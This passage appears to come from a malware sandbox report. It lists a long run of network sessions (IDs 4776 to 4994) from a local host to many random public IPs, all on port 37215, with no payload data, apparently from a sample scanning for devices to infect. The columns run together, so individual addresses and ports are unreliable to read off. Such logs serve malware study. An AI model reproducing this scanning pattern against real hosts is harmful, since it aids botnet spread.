                                          4776192.168.2.234911041.1.73.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4777192.168.2.235461825.111.159.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4778192.168.2.2334528197.65.224.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4779192.168.2.235559641.57.242.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4780192.168.2.233455641.105.240.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4781192.168.2.235797441.108.112.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4782192.168.2.233525441.212.169.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4783192.168.2.2354904157.111.140.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4784192.168.2.2348536157.62.253.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4785192.168.2.235563641.216.106.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4786192.168.2.233319041.35.2.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4787192.168.2.2338956157.205.153.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4788192.168.2.235019441.122.149.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4789192.168.2.235345441.3.127.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4790192.168.2.234295841.48.185.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4791192.168.2.2345524157.224.40.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4792192.168.2.2358584197.61.18.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4793192.168.2.2337094197.186.157.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4794192.168.2.2344742157.238.133.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4795192.168.2.2350640195.153.216.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4796192.168.2.234182246.160.180.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4797192.168.2.234798899.187.165.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4798192.168.2.2335458157.248.240.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4799192.168.2.2338748219.162.90.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4800192.168.2.2352418197.74.169.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4801192.168.2.2353612194.117.214.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4802192.168.2.235927641.106.101.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4803192.168.2.235293241.237.125.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4804192.168.2.2333944157.18.81.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4805192.168.2.2334672197.0.0.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4806192.168.2.234381441.152.59.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4807192.168.2.2338220157.213.7.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4808192.168.2.234762841.73.173.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4809192.168.2.233655627.83.241.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4810192.168.2.235681639.160.113.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4811192.168.2.234575847.47.215.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4812192.168.2.2340412157.119.146.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4813192.168.2.2351066197.50.110.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4814192.168.2.2348724124.183.27.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4815192.168.2.2339230197.97.246.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4816192.168.2.2341854197.103.59.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4817192.168.2.2352724197.84.27.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4818192.168.2.233941441.138.216.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4819192.168.2.2359712157.158.123.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4820192.168.2.2358872197.240.119.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4821192.168.2.2348156223.226.124.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4822192.168.2.2358928197.33.124.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4823192.168.2.233894841.119.3.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4824192.168.2.234027041.7.166.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4825192.168.2.2346268157.120.226.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4826192.168.2.2358382197.64.231.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4827192.168.2.2359886157.153.45.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4828192.168.2.2345658197.117.224.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4829192.168.2.233655241.184.177.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4830192.168.2.235974041.68.22.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4831192.168.2.2342122157.200.136.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4832192.168.2.2346290157.236.216.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4833192.168.2.2335686222.130.159.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4834192.168.2.235959441.34.98.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4835192.168.2.233316241.93.195.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4836192.168.2.234543441.174.4.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4837192.168.2.2343514197.17.175.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4838192.168.2.233773041.68.18.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4839192.168.2.2345022197.154.156.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4840192.168.2.2344304157.237.18.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4841192.168.2.234472041.190.219.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4842192.168.2.234167623.47.52.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4843192.168.2.2337392197.38.180.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4844192.168.2.2336490157.168.185.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4845192.168.2.2350816157.184.90.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4846192.168.2.2352040163.248.237.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4847192.168.2.234897841.43.61.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4848192.168.2.2357544197.94.98.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4849192.168.2.2344558197.41.38.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4850192.168.2.2338404143.87.215.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4851192.168.2.2352806197.79.254.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4852192.168.2.2341230147.33.206.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4853192.168.2.235652241.1.153.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4854192.168.2.2353750146.88.231.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4855192.168.2.2341798157.19.68.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4856192.168.2.2353886157.42.33.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4857192.168.2.2353652200.4.208.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4858192.168.2.2358770197.37.79.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4859192.168.2.2341638197.228.97.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4860192.168.2.2354790157.126.219.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4861192.168.2.2358012157.121.79.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4862192.168.2.2357956197.254.83.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4863192.168.2.2357032197.205.106.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4864192.168.2.2338726157.134.131.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4865192.168.2.235965041.7.243.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4866192.168.2.234985441.170.27.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4867192.168.2.2341538157.217.113.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4868192.168.2.2340866197.22.145.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4869192.168.2.2348086197.49.108.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4870192.168.2.2335690157.200.60.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4871192.168.2.234067841.217.70.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4872192.168.2.2342856123.102.7.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4873192.168.2.2343492173.18.186.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4874192.168.2.2345826108.221.50.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4875192.168.2.234262041.102.197.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4876192.168.2.2357448197.151.251.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4877192.168.2.235670041.87.73.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4878192.168.2.2352976197.255.74.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4879192.168.2.2359814206.213.18.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4880192.168.2.234956665.19.207.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4881192.168.2.2358522157.61.216.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4882192.168.2.2353168197.160.211.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4883192.168.2.234626241.212.97.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4884192.168.2.2350076197.69.34.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4885192.168.2.2333724157.228.31.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4886192.168.2.233945041.255.246.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4887192.168.2.2334156157.164.40.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4888192.168.2.2349048197.114.121.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4889192.168.2.2348658197.168.242.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4890192.168.2.233448439.60.90.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4891192.168.2.2353920157.95.115.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4892192.168.2.2353358157.171.91.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4893192.168.2.2342786157.45.228.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4894192.168.2.2347030163.113.149.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4895192.168.2.2334700197.109.76.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4896192.168.2.233546287.101.81.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4897192.168.2.2335350157.172.249.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4898192.168.2.2352150157.111.33.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4899192.168.2.2352594222.24.211.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4900192.168.2.2337276157.249.82.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4901192.168.2.2354284197.78.232.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4902192.168.2.2340682197.202.136.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4903192.168.2.2343060159.57.2.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4904192.168.2.2333164197.118.196.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4905192.168.2.2348102157.39.180.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4906192.168.2.2353724157.229.164.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4907192.168.2.235110641.9.130.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4908192.168.2.235479041.1.49.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4909192.168.2.234535841.124.208.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4910192.168.2.2341902157.20.60.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4911192.168.2.2360760195.107.248.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4912192.168.2.2333988197.103.227.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4913192.168.2.233766241.0.152.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4914192.168.2.234044641.18.227.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4915192.168.2.2350790185.39.22.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4916192.168.2.2349164157.31.101.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4917192.168.2.2356386197.210.189.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4918192.168.2.235252641.48.12.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4919192.168.2.2347030128.201.40.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4920192.168.2.2338524197.77.135.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4921192.168.2.235395641.76.249.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4922192.168.2.2339568197.250.204.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4923192.168.2.2336174157.137.42.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4924192.168.2.2348246197.41.183.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4925192.168.2.2347676185.196.181.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4926192.168.2.2333910157.131.185.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4927192.168.2.2359330197.58.38.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4928192.168.2.2348748157.161.68.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4929192.168.2.2351688197.74.53.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4930192.168.2.2345792157.134.176.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4931192.168.2.233739841.97.134.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4932192.168.2.233819841.74.134.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4933192.168.2.234837695.35.111.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4934192.168.2.2341414201.59.139.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4935192.168.2.2333806197.168.199.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4936192.168.2.235155841.92.225.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4937192.168.2.234559654.106.13.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4938192.168.2.235047441.170.5.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4939192.168.2.2343620157.141.205.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4940192.168.2.235874441.182.117.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4941192.168.2.2349342197.57.82.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4942192.168.2.2348118197.170.236.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4943192.168.2.234614041.183.220.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4944192.168.2.2334092157.30.244.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4945192.168.2.2336712171.212.100.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4946192.168.2.235710441.234.215.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4947192.168.2.2352748157.204.163.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4948192.168.2.2338026139.57.175.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4949192.168.2.2351390157.21.88.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4950192.168.2.2356972197.92.16.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4951192.168.2.234697454.248.175.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4952192.168.2.2342656197.247.53.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4953192.168.2.234349241.227.89.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4954192.168.2.2339060157.243.104.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4955192.168.2.2334898157.43.185.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4956192.168.2.2337790157.170.51.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4957192.168.2.2356510115.79.39.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4958192.168.2.2349186157.41.162.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4959192.168.2.235952441.6.188.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4960192.168.2.2335602157.214.15.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4961192.168.2.2347894157.181.42.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4962192.168.2.2347640197.31.120.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4963192.168.2.2343656157.216.23.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4964192.168.2.233687068.188.166.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4965192.168.2.2333170218.218.0.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4966192.168.2.233908641.203.60.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4967192.168.2.235126241.246.21.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4968192.168.2.2341668159.33.108.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4969192.168.2.2339920157.112.110.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4970192.168.2.233447441.162.149.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4971192.168.2.2333978157.40.139.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4972192.168.2.2335550197.49.116.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4973192.168.2.2348340157.193.167.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4974192.168.2.235728041.101.88.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4975192.168.2.235347275.137.80.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4976192.168.2.2360034202.191.104.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4977192.168.2.2332994197.21.168.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4978192.168.2.2355628197.165.163.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4979192.168.2.2334274197.19.113.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4980192.168.2.2358352157.72.155.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4981192.168.2.2352012183.97.119.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4982192.168.2.2351120101.182.250.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4983192.168.2.2351502169.144.142.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4984192.168.2.234743241.83.108.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4985192.168.2.2341774157.25.141.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4986192.168.2.235106641.210.226.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4987192.168.2.2333288197.228.42.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4988192.168.2.2357340220.160.229.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4989192.168.2.2338622197.87.153.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4990192.168.2.2337452197.247.240.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4991192.168.2.235102441.142.52.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4992192.168.2.233351841.71.143.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4993192.168.2.2347544157.223.111.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4994192.168.2.2348368197.108.31.15537215
